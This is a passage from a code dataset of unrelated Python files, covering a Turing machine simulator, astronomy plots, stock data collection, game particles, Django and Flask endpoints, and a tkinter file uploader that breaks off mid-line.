st_transitions = {}\r\n            st = False\r\n            for t in state.transitions:\r\n                if t[0] == '[' and t[-1] == ']':\r\n                    st_transitions[t[1:-1]] = state.transitions[t]\r\n            if len(st_transitions) != 0:\r\n                if self.second_tape in st_transitions:\r\n                    sym = '['+self.second_tape+']'\r\n                    st = True\r\n                elif '*' in st_transitions:\r\n                    sym = '[*]'\r\n                    st = True\r\n            if st:\r\n                t = state.transitions[sym]\r\n                self.transition(t)\r\n                st = False\r\n            elif 'copiar' in state.transitions:\r\n                t = state.transitions['copiar']\r\n                self.second_tape = self.reading\r\n                self.current_state = state.transitions['copiar'][0]\r\n            elif 'colar' in state.transitions:\r\n                t = state.transitions['colar']\r\n                self.word = new_word(self.word, self.head, self.second_tape)\r\n                self.current_state = state.transitions['colar'][0]\r\n            # new block\r\n            else:\r\n                for key in state.transitions:\r\n                    if key in self.blocks:\r\n                        t = state.transitions[key]\r\n                        self.exec_stack.append(self.current_block)\r\n                        self.exec_stack.append(state.transitions[key][0])\r\n                        self.current_block = key\r\n                        self.current_state = self.blocks[key].init_state\r\n                        if self.current_state == 'retorne':\r\n                            self.current_state = self.exec_stack.pop()\r\n                            self.current_block = self.exec_stack.pop()\r\n\r\n            if t[-1] == '!':\r\n                print('\\nBreak Point')\r\n                self.break_point = True\r\n\r\n    def transition(self, t):\r\n        new_sym = t[0]\r\n        move = t[1]\r\n        new_state = t[2]\r\n        if new_sym != '*':\r\n            self.word = new_word(self.word, self.head, new_sym)\r\n        self.movement(move)\r\n        if new_state != '*':\r\n            self.current_state = new_state\r\n        if self.current_state == 'aceite':\r\n            self.aceita()\r\n            self.finalize = True\r\n        elif self.current_state == 'rejeite':\r\n            self.rejeita()\r\n            self.finalize = True\r\n        elif self.current_state == 'retorne':\r\n            self.current_state = self.exec_stack.pop()\r\n            self.current_block = self.exec_stack.pop()\r\n\r\n    
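# Move the head one cell left ('e') or right ('d'), growing the tape with a blank cell when the head walks off either end.\r\n    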
def movement(self, move):\r\n        if move == 'e':\r\n            if self.head == 0:\r\n                self.word = '_' + self.word\r\n            else:\r\n                self.head -= 1\r\n        if move == 'd':\r\n            # use the live word length: the tape may have grown since __init__\r\n            if self.head == len(self.word) - 1:\r\n                self.word = self.word + '_'\r\n            self.head += 1\r\n\r\n    def aceita(self):\r\n        _, word = put_head(self.word, self.head, self.delimiter)\r\n        print(self.instant_config())\r\n        print('\\nACEITA\\n' + '{:->70}'.format('\\n') + rm_space(word) + \\\r\n              '\\n{:->70}'.format('\\n') + 'FIM DA SIMULAÇÃO\\n')\r\n\r\n    def rejeita(self):\r\n        print(self.instant_config())\r\n        _, word = put_head(self.word, self.head, self.delimiter)\r\n        print('\\nREJEITA\\n' + '{:->70}'.format('\\n') + rm_space(word) + \\\r\n              '\\n{:->70}'.format('\\n') + 'FIM DA SIMULAÇÃO\\n')\r\n","sub_path":"TuringMachine.py","file_name":"TuringMachine.py","file_ext":"py","file_size_in_byte":7314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"}
+{"seq_id":"600024022","text":"import os, os.path\nimport numpy\nimport isodist\nfrom galpy.util import bovy_plot\nfrom segueSelect import _mr_gi, _gi_gr, _mr_ri_bright, _mr_ri_faint, \\\n    _ri_gr\n_EXT='ps'\ndef plotAnIvezicDiff(dir):\n    #Load An isochrones\n    a= isodist.AnIsochrone()\n    #Plot difference for a few metallicities\n    fehs= [0.,-0.1,-0.2,-0.3,-0.5,-1.,-1.5]\n    colors= ['b','c','g','y','orange','m','r']\n    #Set up plot\n    bovy_plot.bovy_print()\n    bovy_plot.bovy_plot([-100.,-100.],[-100.,-100],'k,',\n                        #xrange=[0.47,0.58],\n                        xrange=[0.53,0.78],\n                        yrange=[-0.25,.25],\n                        xlabel=r'$g-r\\ [\\mathrm{mag}]$',\n                        ylabel=r'$\\mathrm{DM}_{\\mathrm{An}}-\\mathrm{DM}_{\\mathrm{Ivezi\\acute{c}}}\\ [\\mathrm{mag}]$')\n    xlegend, ylegend, dy= 0.545, 0.2,-0.03\n    for ii in range(len(fehs)):\n        iso= a(numpy.log10(10.),feh=fehs[ii])\n        #Get G dwarfs\n        indx= (iso['g']-iso['r'] <= 0.75)*(iso['g']-iso['r'] >= 0.55)\\\n            *(iso['logg'] > 4.1)\n        y= -1.*(iso['r'][indx]-_mr_gi(_gi_gr(iso['g'][indx]\n                                             -iso['r'][indx]),fehs[ii]))\n        bovy_plot.bovy_plot(iso['g'][indx]-iso['r'][indx],\n                            y,\n                            '-',color=colors[ii],\n                            overplot=True)\n        bovy_plot.bovy_text(xlegend,ylegend+ii*dy,\n                            r'$[\\mathrm{Fe/H]=%+4.1f}$' % fehs[ii],\n                            color=colors[ii])\n    bovy_plot.bovy_end_print(os.path.join(dir,'dm_an_ivezic.'+_EXT))\n\ndef plotJuricIvezicDiff(dir):\n    #Plot difference for a few metallicities\n    fehs= [0.,-0.1,-0.2,-0.3,-0.5,-1.,-1.5]\n    colors= ['b','c','g','y','orange','m','r']\n    #Set up plot\n    bovy_plot.bovy_print()\n    bovy_plot.bovy_plot([-100.,-100.],[-100.,-100],'k,',\n                        xrange=[0.47,0.58],\n                        yrange=[-1.,1.],\n                        xlabel=r'$g-r\\ [\\mathrm{mag}]$',\n                        ylabel=r'$\\mathrm{DM}_{\\mathrm{Juri\\acute{c}}}-\\mathrm{DM}_{\\mathrm{Ivezi\\acute{c}}}\\ [\\mathrm{mag}]$')\n    xlegend, ylegend, dy= 0.55, 0.8,-0.12\n    grs= numpy.linspace(0.48,0.55,1001)\n    for ii in range(len(fehs)):\n        ybright= -1.*(_mr_ri_bright(_ri_gr(grs))-_mr_gi(_gi_gr(grs),fehs[ii]))\n        yfaint= -1.*(_mr_ri_faint(_ri_gr(grs))-_mr_gi(_gi_gr(grs),fehs[ii]))\n        bovy_plot.bovy_plot(grs,\n                            ybright,\n                            '-',color=colors[ii],\n                            overplot=True)\n        bovy_plot.bovy_plot(grs,\n                            yfaint,\n                            '--',color=colors[ii],\n                            overplot=True)\n        bovy_plot.bovy_text(xlegend,ylegend+ii*dy,\n                            r'$[\\mathrm{Fe/H]=%+4.1f}$' % fehs[ii],\n                            color=colors[ii])\n    bovy_plot.bovy_end_print(os.path.join(dir,'dm_juric_ivezic.'+_EXT))\n\nif __name__ == '__main__':\n    import sys\n    if len(sys.argv) > 2:\n        plotJuricIvezicDiff(sys.argv[1])\n    else:\n        
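# A single command-line argument selects the An vs. Ivezic comparison plot.\n        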
plotAnIvezicDiff(sys.argv[1])\n","sub_path":"py/plotAnIvezicDiff.py","file_name":"plotAnIvezicDiff.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"}
+{"seq_id":"651375325","text":"# -*- coding:utf-8 -*- \r\n'''\r\nCreated on 2016/10/07\r\nData Collecting\r\n@author: Cruise Huang\r\n'''\r\nimport os.path\r\nfrom datetime import datetime,date,time,timedelta\r\nfrom functools import partial\r\nfrom multiprocessing.pool import Pool\r\n\r\nimport pandas as pd\r\n\r\nfrom tushare.stock import trading as td\r\nfrom tushare.stock import billboard as bb\r\nfrom tushare.stock import cons as ct\r\n\r\nimport config as cfg\r\nimport utils\r\n\r\n\r\ndef get_today_all_multi():\r\n    ct._write_head()\r\n    print('获取当日全部数据')\r\n    multiFunc = partial(td._parsing_dayprice_json)\r\n    with Pool(12) as p:\r\n        results = p.map(multiFunc, range(1,ct.PAGE_NUM[0]))\r\n        p.close()\r\n        p.join()\r\n\r\n    df = pd.DataFrame()\r\n    for result in results:\r\n        df=df.append(result, ignore_index=True);\r\n\r\n    print('\\n获取当日全部数据结束')\r\n    return df\r\n\r\ndef write_his(result, path):\r\n    utils.msg('\\rWriting to:' + path)\r\n    result.to_csv(path, encoding='utf8')\r\n\r\ndef get_his(symbol, write2disk):\r\n    path2Stock = cfg.PATH_2_HIS_DATA + symbol +'.csv'\r\n    if(os.path.exists(path2Stock) and \r\n       datetime.fromtimestamp(os.path.getmtime(cfg.FILE_CODES)).date() == datetime.fromtimestamp(os.path.getmtime(path2Stock)).date()):\r\n        return\r\n\r\n    df = td.get_hist_data(code=symbol,start=None, end=None,\r\n                          ktype='D', retry_count=3, pause=0.001)\r\n    df.insert(loc=0,column='code',value=symbol)\r\n\r\n    if(write2disk and df is not None):\r\n        write_his(df, path2Stock)\r\n\r\n\r\ndef get_hists_multi(symbols, write2disk=False, start=None, end=None,\r\n                    ktype='D', retry_count=1,\r\n                    pause=0.01):\r\n    \"\"\"\r\n    Fetch historical quotes for a batch of symbols; see the get_hist_data\r\n    interface for parameter details and the returned data type.\r\n    \"\"\"\r\n    ct._write_head()\r\n    print('批量获取历史行情数据')\r\n    if isinstance(symbols, list) or isinstance(symbols, set) or isinstance(symbols, tuple) or isinstance(symbols, pd.Series):\r\n        multiFunc = partial(get_his, write2disk=True)\r\n        with Pool(8) as p:\r\n            results = p.map(multiFunc, symbols)\r\n            p.close()\r\n            p.join()\r\n\r\n        print('\\n批量获取历史行情数据结束')\r\n    else:\r\n        return None\r\n\r\n\r\ndef write_stockcodes():\r\n    stockCodes = get_today_all_multi()\r\n    stockCodes.to_csv(cfg.MAIN_DIR+'all_today.csv',encoding='utf8')\r\n    stockCodes.to_csv(cfg.FILE_CODES, columns=['code','name'], encoding='utf8')\r\n\r\ndef write_all_his():\r\n    loaded = pd.read_csv(cfg.FILE_CODES, dtype='str', encoding='utf8')\r\n    get_hists_multi(loaded['code'], write2disk=True)\r\n\r\ndef read_his(code):\r\n    utils.msg('\\rReading: '+code)\r\n\r\n    codeHisPath = cfg.PATH_2_HIS_DATA + code+'.csv'\r\n\r\n    if(os.path.exists(codeHisPath) == False):\r\n        print('Path Not Exists:' + code)\r\n        return None\r\n\r\n    df = pd.read_csv(codeHisPath, dtype='str', encoding='utf8')\r\n    return df\r\n\r\ndef read_all_his():\r\n    loaded = pd.read_csv(cfg.FILE_CODES, dtype='str', encoding='utf8')\r\n    allHis = pd.DataFrame()\r\n    lastDay = pd.DataFrame()\r\n\r\n    readFunc = partial(read_his)\r\n    with Pool(16) as rp:\r\n        results = rp.map(readFunc, loaded['code'])\r\n        rp.close()\r\n        rp.join()\r\n\r\n    for stock in results:\r\n        if(stock is None):\r\n            continue\r\n        utils.msg('\\rHandling: '+ stock.ix[0]['code'])\r\n        allHis = allHis.append(stock,ignore_index=True)\r\n        lastDay = lastDay.append(stock.head(1),ignore_index=True)\r\n\r\n    return [allHis,lastDay]\r\n\r\n\r\ndef 
write_all_lastday(df):\r\n df.to_csv(cfg.MAIN_DIR+'stocks_his_lastday.csv', encoding='utf8')\r\n return df\r\n\r\ndef write_billboard():\r\n print('获取龙虎榜数据')\r\n path = utils.getPath(cfg.PATH_2_BILLBOARD)\r\n\r\n dateStr = (utils.now() + timedelta(days=1)).strftime('%Y%m%d')\r\n\r\n df5 = bb.cap_tops(days=5)\r\n #df5.to_csv(PATH_2_BILLBOARD+dateStr+'_5d.csv',encoding='utf8')\r\n df10 = bb.cap_tops(days=10)\r\n #df10.to_csv(PATH_2_BILLBOARD+dateStr+'_10d.csv',encoding='utf8')\r\n print('\\n获取龙虎榜数据结束')\r\n\r\n merged = df5.merge(df10, on=['code','name'],suffixes=('_5','_10'),how='outer')\r\n merged.to_csv(path+dateStr+'_merged.csv', encoding='utf8')\r\n\r\n\r\ndef main():\r\n now = utils.now()\r\n fileCount = len(os.listdir(cfg.PATH_2_HIS_DATA))\r\n \r\n if(os.path.exists(cfg.FILE_CODES) == False \r\n or (now.time() > time(hour=15) and datetime.fromtimestamp(os.path.getmtime(cfg.FILE_CODES)).date() < now.date())\r\n or fileCount < len(pd.read_csv(cfg.FILE_CODES, dtype='str', encoding='utf8'))):\r\n write_stockcodes()\r\n write_all_his()\r\n \r\n df = read_all_his()\r\n write_all_lastday(df[1])\r\n\r\n write_billboard()\r\n \r\nif __name__ == '__main__':\r\n main()","sub_path":"cruise/a_dc_dataCollect.py","file_name":"a_dc_dataCollect.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"583664634","text":"from utils import rectCollision\nfrom platform import *\nfrom random import randint\nfrom math import *\n\n#Used for when the brick is destroyed\nclass BrickParticle:\n\tdef __init__(self, x, y):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.width = 10\n\t\tself.height = 10\n\n\t\tself.xVel = randint(-15,15)\n\t\tself.yVel = 10\n\t\tself.jumping = True\n\n\t\tself.color = \"blue\"\n\n\tdef handle(self, data):\n\t\tself.yVel -= 1\n\t\tself.jumping = True\n\n\t\tfor platform in data.tiles:\n\t\t\tplatform.collide(self)\n\n\t\t#Move Particle (part 2)\n\t\tif (self.jumping):\n\t\t\tself.y -= self.yVel\n\t\t\tself.x += self.xVel\n\t\telse:\n\t\t\tself.xVel = self.xVel * .9\n\t\t\tself.x += self.xVel\n\t\t\tself.yVel = 0\n\n\tdef draw(self, canvas, data):\n\t\tcanvas.create_rectangle(self.x - data.camX, self.y - data.camY, self.x + self.width - data.camX, self.y + self.height - data.camY, fill = self.color)\n\n#Used for when firebolt hits wall\nclass SmallFireDebris:\n\tdef __init__(self, x, y, direction):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.width = 5\n\t\tself.height = 5\n\t\tself.direction = direction\n\t\tself.color = \"red\"\n\n\t\tself.xVel = randint(1,10)\n\t\tself.yVel = randint(-5,5)\n\t\tself.jumping = True\n\t\tself.dissipateTime = randint(10,40)\n\t\tself.timer = 0\n\n\t\tif (self.direction == \"right\"):\n\t\t\tself.xVel = - self.xVel\n\n\tdef handle(self, data):\n\t\tif (self.yVel > 0):\n\t\t\tself.yVel -= 1\n\t\telse:\n\t\t\tself.yVel += 1\n\t\tself.jumping = True\n\n\t\tfor platform in data.tiles:\n\t\t\tplatform.collide(self)\n\n\t\t#Move particles part 2\n\t\tself.y += self.yVel\n\t\tself.x += self.xVel\n\t\tself.xVel = self.xVel*.8\n\n\t\tself.timer += 1\n\t\tif (self.timer == self.dissipateTime):\n\t\t\tdata.particles.remove(self)\n\n\tdef draw(self, canvas, data):\n\t\tcanvas.create_rectangle(self.x - data.camX, self.y - data.camY, self.x + self.width - data.camX, self.y + self.height - data.camY, fill = self.color)\n\n#Is created after electric strike hits the ground\nclass ElectricStrikeDebris:\n\tdef __init__(self, x, y, speed):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.width = 
2\n\t\tself.height = 2\n\t\tself.color = \"blue\"\n\t\t\n\t\tself.yVel = 5\n\t\tself.accY = randint(12,20)/10\n\t\tself.speed = speed\n\t\tself.xVel = speed\n\n\t\tself.dissipateTime = randint(30, 50)\n\t\tself.timer = 0\n\n\tdef handle(self, data):\n\t\tself.yVel = self.yVel / self.accY\n\n\t\tself.xVel = self.xVel * .8\n\n\t\tself.x += self.xVel\n\t\tself.y -= self.yVel\n\n\t\tself.timer += 1\n\t\tif (self.timer >= self.dissipateTime):\n\t\t\tdata.particles.remove(self)\n\n\tdef draw(self, canvas, data):\n\t\tcanvas.create_rectangle(self.x - data.camX, self.y - data.camY, self.x + self.width - data.camX, self.y + self.height - data.camY, fill = self.color)\n\n#Used when zombie dies\nclass ZombieDeathParticle:\n\tdef __init__(self, x, y):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.width = 5\n\t\tself.height = 5\n\t\tself.color = \"green\"\n\n\t\tself.xVel = randint(-5,5)\n\t\tself.yVel = -3\n\n\t\tself.timer = 0\n\t\tself.dissipateTime = 20\n\n\tdef handle(self, data):\n\t\tself.xVel = randint(-5,5)\n\t\tself.x += self.xVel\n\t\tself.y += self.yVel\n\n\t\tself.timer += 1\n\t\tif (self.timer >= self.dissipateTime):\n\t\t\tdata.particles.remove(self)\n\n\tdef draw(self, canvas, data):\n\t\tcanvas.create_rectangle(self.x - data.camX, self.y - data.camY, self.x + self.width - data.camX, self.y + self.height - data.camY, fill = self.color)\n\n\ndef init(data):\n\tdata.particles = []\n\ndef handler(data):\n\tfor particle in data.particles:\n\t\tparticle.handle(data)\n\ndef drawer(data, canvas):\n\tfor particle in data.particles:\n\t\tparticle.draw(canvas, data)","sub_path":"particles.py","file_name":"particles.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"308777709","text":"from django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.renderers import JSONRenderer\nfrom rest_framework.parsers import JSONParser\nfrom .models import Juego\nfrom .serializers import JuegoSerializer\n\n\n# Create your views here.\n\nclass JSONResponse(HttpResponse):\n \"\"\"\n An HttpResponse that renders its content into JSON.\n \"\"\"\n def __init__(self, data, **kwargs):\n content = JSONRenderer().render(data)\n kwargs['content_type'] = 'application/json'\n super(JSONResponse, self).__init__(content, **kwargs)\n\n@csrf_exempt\ndef juego_list(request):\n \"\"\"\n List all code serie, or create a new serie.\n \"\"\"\n if request.method == 'GET':\n juegos = Juego.objects.all()\n serializer = JuegoSerializer(juegos, many=True)\n return JSONResponse(serializer.data)\n\n elif request.method == 'POST':\n data = JSONParser().parse(request)\n serializer = JuegoSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JSONResponse(serializer.data, status=201)\n return JSONResponse(serializer.errors, status=400)\n\n@csrf_exempt\ndef juego_detail(request, pk):\n \"\"\"\n Retrieve, update or delete a serie.\n \"\"\"\n try:\n juego = Juego.objects.get(pk=pk)\n except Juego.DoesNotExist:\n return HttpResponse(status=404)\n\n if request.method == 'GET':\n serializer = JuegoSerializer(juego)\n return JSONResponse(serializer.data)\n\n elif request.method == 'PUT':\n data = JSONParser().parse(request)\n serializer = JuegoSerializer(juego, data=data)\n if serializer.is_valid():\n serializer.save()\n return JSONResponse(serializer.data)\n return JSONResponse(serializer.errors, status=400)\n\n elif request.method == 'DELETE':\n juego.delete()\n return 
HttpResponse(status=204)","sub_path":"juegos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"}
+{"seq_id":"352597854","text":"from flask import Flask\r\nfrom flask import request\r\nfrom flask import jsonify\r\nfrom flask_cors import CORS, cross_origin\r\nimport json\r\nfrom Servidumbre_app import mainFuntion\r\n\r\napp = Flask(__name__)\r\nCORS(app, support_credentials=True)\r\n@app.route(\"/planos\",methods=['GET', 'POST'])\r\ndef genPlanos():\r\n data = json.loads(request.data)\r\n excelPath = data['excelPath']\r\n dxfPath = data['dxfPath']\r\n csvPath = data['csvPath']\r\n dirPath = data['dirPath']\r\n mainFuntion(excelPath, dxfPath, csvPath, dirPath)\r\n return jsonify(excelPath, dxfPath, csvPath, dirPath)\r\n\r\n@app.route(\"/auto\",methods=['GET', 'POST'])\r\ndef genAutho():\r\n data = json.loads(request.data)\r\n excelPath = data['excelPath']\r\n autoPath = data['autoPath']\r\n dirPath = data['dirPath']\r\n #AutoFunction(excelPath, autoPath, dirPath)\r\n return jsonify(excelPath, autoPath, dirPath)\r\n\r\n@app.route(\"/contrato\",methods=['GET', 'POST'])\r\ndef genContrato():\r\n data = json.loads(request.data)\r\n excelPath = data['excelPath']\r\n contratoPath = data['contratoPath']\r\n dirPath = data['dirPath']\r\n #AutoFunction(excelPath, contratoPath, dirPath)\r\n return jsonify(excelPath, contratoPath, dirPath)\r\n\r\n@app.route(\"/valorizacion\",methods=['GET', 'POST'])\r\ndef genValorizacion():\r\n data = json.loads(request.data)\r\n excelPath = data['excelPath']\r\n valorizacionPath = data['valorizacionPath']\r\n dirPath = data['dirPath']\r\n #ContratoFunction(excelPath, valorizacionPath, dirPath)\r\n return jsonify(excelPath, valorizacionPath, dirPath)\r\n\r\n@app.route(\"/recibo\",methods=['GET', 'POST'])\r\ndef genRecibo():\r\n data = json.loads(request.data)\r\n excelPath = data['excelPath']\r\n reciboPath = data['reciboPath']\r\n dirPath = data['dirPath']\r\n #ContratoFunction(excelPath, reciboPath, dirPath)\r\n return jsonify(excelPath, reciboPath, dirPath)\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host='127.0.0.1', port=5001)","sub_path":"src/py/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"}
+{"seq_id":"144786614","text":"from sklearn import decomposition\nimport numpy as np\nimport pickle\n\nclass DictionaryBuilder():\n\n def __init__(self,dataFile,outputFile,size):\n data = np.loadtxt(open(dataFile,\"rb\"),delimiter=\",\",skiprows=0)\n dictionary = decomposition.MiniBatchDictionaryLearning(n_components=size, alpha=1, n_iter=500).fit(data)\n dictionaryData = pickle.dumps(dictionary)\n # pickle.dumps returns bytes, so the output file must be opened in binary mode\n f = open(outputFile,\"wb\")\n f.write(dictionaryData)\n f.close()","sub_path":"src/gold/learn/DictionaryBuilder.py","file_name":"DictionaryBuilder.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"}
+{"seq_id":"632464899","text":"import webbrowser\n\nclass Movie():\n def __init__(self, movie_title, year_released, movie_storyline, poster_image, youtube_trailer):\n self.title = movie_title\n self.year = year_released\n self.storyline = movie_storyline\n self.poster_url = poster_image\n self.youtube_trailer_url = youtube_trailer\n\n def show_trailer(self):\n # To open a page in the browser\n 
webbrowser.open(self.youtube_trailer_url)\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"548343911","text":"import numpy as np\nfrom netCDF4 import Dataset, num2date # to work with NetCDF files\nfrom os.path import expanduser\nimport matplotlib.pyplot as plt\nhome = expanduser(\"~\") # Get users home directory\nimport statsmodels.api as sm\nfrom scipy import stats\n\nimport xarray as xr\nimport pytz\nimport glob, os\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt \nimport matplotlib.dates as mdates\nimport datetime\nfrom dateutil import tz\nimport metpy.calc as mpcalc\nfrom metpy.units import units\n\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.ticker as ticker\nimport matplotlib.colors as colors\nimport matplotlib.cm as cmx\n\nmatplotlib.rcParams.update({'font.size': 24})\n\n#Directory where sondes are stored\n#dir_profile = \"/media/ludo/DATA/google-drive/Thèse/EUREC4a/github/Input/Products/\"\n#path_to_sonde_profiles = os.path.join(dir_profile,\"rad_profiles_all_sondes_ERA.nc\")\n\ndir_profile = \"../output/rad_profiles\"\npath_to_sonde_profiles = os.path.join(dir_profile,\"rad_profiles.nc\")\n\nsonde_profiles = xr.open_dataset(path_to_sonde_profiles)\n\nsonde_BCO = sonde_profiles.where(sonde_profiles.platform==\"BCO\", drop=True)\n\ndef get_variables_day_to_day(profiles):\n\n data = profiles[\"q_rad\"]\n data[\"q_rad_sw\"] = profiles[\"q_rad_lw\"]\n data[\"q_rad_lw\"] = profiles[\"q_rad_sw\"]\n\n data[\"time\"] = profiles[\"launch_time\"]\n data = data.drop_vars([\"lay\",\"col\"])\n \n data = data.to_dataframe()\n data[\"time\"] = data[\"time\"].dt.tz_localize(pytz.UTC).dt.tz_convert('America/Barbados').dt.strftime(\"%Y%m%dT%H\")\n \n data[\"time\"] = pd.to_datetime(data[\"time\"], format=\"%Y%m%dT%H\")\n\n data = data.reset_index()\n data = data.set_index([\"time\",\"zlay\"])\n data = data.groupby([pd.Grouper(freq='1H', level='time', label=\"right\"), \n pd.Grouper(level='zlay')]).mean()\n \n #come back to xarray and get q_rad\n data = data.to_xarray()\n \n time = data.time.values\n zlay = data.zlay.values\n q_rad = np.transpose(data.q_rad.values)\n q_rad_sw = np.transpose(data.q_rad_lw.values)\n q_rad_lw = np.transpose(data.q_rad_sw.values)\n\n return time, zlay, q_rad, q_rad_lw, q_rad_sw\n\ndef plot_day_to_day(profiles):\n\n time, zlay, q_rad, q_rad_lw, q_rad_sw = get_variables_day_to_day(profiles)\n\n dates_list = [date for date in time]\n\n fig, ax = plt.subplots(3,1,figsize=(20,30))\n\n fig.subplots_adjust(left=0.1, bottom=0.2, right=0.9, top=0.9, wspace=0.2, hspace=0.2)\n\n pad=10\n fs=24\n loc=\"left\"\n fw=\"bold\"\n ax[0].set_title(r'a) Shortwave', loc=loc, pad=pad,fontsize=fs, fontweight=fw)\n ax[1].set_title(r'b) Longwave', loc=loc, pad=pad, fontsize=fs, fontweight=fw)\n ax[2].set_title(r'c) Net', loc=loc, pad=pad, fontsize=fs, fontweight=fw)\n\n ax[1].set_ylabel('Altitude (km)')\n ax[2].set_xlabel('Date')\n\n ymin=0\n ymax=10\n\n colormap = matplotlib.cm.get_cmap(\"RdBu_r\")\n val_min = -4\n val_max = 4\n\n zlay=zlay/1000\n\n ax[0].pcolormesh(dates_list, zlay, q_rad_sw, cmap=colormap,vmin=val_min, vmax=val_max)\n ax[1].pcolormesh(dates_list, zlay, q_rad_lw, cmap=colormap,vmin=val_min, vmax=val_max)\n im = ax[2].pcolormesh(dates_list, zlay, q_rad, cmap=colormap,vmin=val_min, vmax=val_max)\n\n myFmt = mdates.DateFormatter('%m-%d')\n\n ini = np.datetime64('2020-01-19 00:00:00')\n end = 
np.datetime64('2020-02-17 00:00:00')\n\n for k in range(3):\n ax[k].xaxis.set_major_formatter(myFmt)\n ax[k].set_ylim([0,ymax])\n ax[k].set_xlim([ini,end])\n\n for k in range(3):\n ticks = ax[k].get_xticks()\n ax[k].set_xticks(np.linspace(ticks[0], ticks[-1], 10))\n\n ax[0].tick_params(labelbottom=False)\n ax[1].tick_params(labelbottom=False)\n\n x,y,w,h = ax[2].get_position().bounds\n c_map_ax = fig.add_axes([x, y-0.25*h, 1*w, 0.06*h])\n cbar = fig.colorbar(im,cax=c_map_ax, orientation=\"horizontal\", extend=\"both\")\n cbar.ax.set_xlabel('Heating Rate (K/day)',color='k') # cbar legend \n\n fig.savefig('../Figures/Fig5_Day_to_day_variability.jpg')\n \nplot_day_to_day(sonde_BCO)\n","sub_path":"scripts/Fig4_Day_to_day_variability.py","file_name":"Fig4_Day_to_day_variability.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"142239648","text":"\nimport json\n\nclass ReadJson:\n\n def __init__(self,filename):\n self.filename='../data/'+filename\n\n def read_json(self):\n with open(self.filename,'r',encoding='utf-8') as f:\n return json.load(f)\n\nif __name__ == '__main__':\n # 读取登录数据的json\n # data = (ReadJson('login.json').read_json())\n # arrs = []\n # arrs.append(\n # (data.get(\"url\"), data.get(\"mobile\"), data.get(\"code\"), data.get(\"status_code\"), data.get(\"expect_result\")))\n # print(arrs)\n\n\n # 读取channel数据的接送\n # data = (ReadJson('channel.json').read_json())\n # arrs = []\n # arrs.append(\n # (data.get(\"url\"), data.get(\"headers\"), data.get(\"expect_code\"), data.get(\"message\")))\n # print(arrs)\n\n # 读取collect_article数据的接送\n # data = (ReadJson('collect_article.json').read_json())\n # arrs = []\n # arrs.append(\n # (data.get(\"url\"), data.get(\"headers\"), data.get(\"expect_code\"),data.get(\"data\") ,data.get(\"message\")))\n # print(arrs)\n\n # 读取article_cancle数据的接送\n data = (ReadJson('article_cancel.json').read_json())\n arrs = []\n arrs.append(\n (data.get(\"url\"), data.get(\"headers\"), data.get(\"expect_code\")))\n print(arrs)","sub_path":"tools/read_json.py","file_name":"read_json.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"388753476","text":"import tkinter\nfrom time import sleep\nfrom tkinter import ttk\nfrom tkinter import messagebox as mb\nfrom tkinter import filedialog\nfrom Spannedfile1.spannedfile1 import mainB\n\n\ndef spanned_file1(top, config):\n def upioad_file_logic():\n value1 = filename.get()\n value1 = str(value1).replace(\"/\", \"\\\\\")\n print(value1, type(value1))\n value2 = test_id.get()\n value3 = need_id.get()\n value4 = casedescription.get()\n value5 = casenature.get()\n value6 = stepid.get()\n value7 = resultid.get()\n value8 = status.get()\n value9 = casepath.get()\n\n def change_schedule(now_schedule, all_schedule):\n canvas.coords(fill_rec, (5, 5, 6 + (now_schedule / all_schedule) * 400, 25))\n window_upioad_file.update()\n x.set(str(round(now_schedule / all_schedule * 100, 2)) + '%')\n if round(now_schedule / all_schedule * 100, 2) == 100.00:\n x.set(\"完成\")\n\n canvas = tkinter.Canvas(window_upioad_file, width=400, height=30, bg=\"white\")\n canvas.place(x=10, y=550)\n x = tkinter.StringVar()\n # 进度条以及完成程度\n # out_rec = canvas.create_rectangle(5, 5, 105, 25, outline=\"blue\", width=1)\n fill_rec = canvas.create_rectangle(5, 5, 5, 25, outline=\"\", width=0, fill=\"green\")\n\n tkinter.Label(window_upioad_file, 
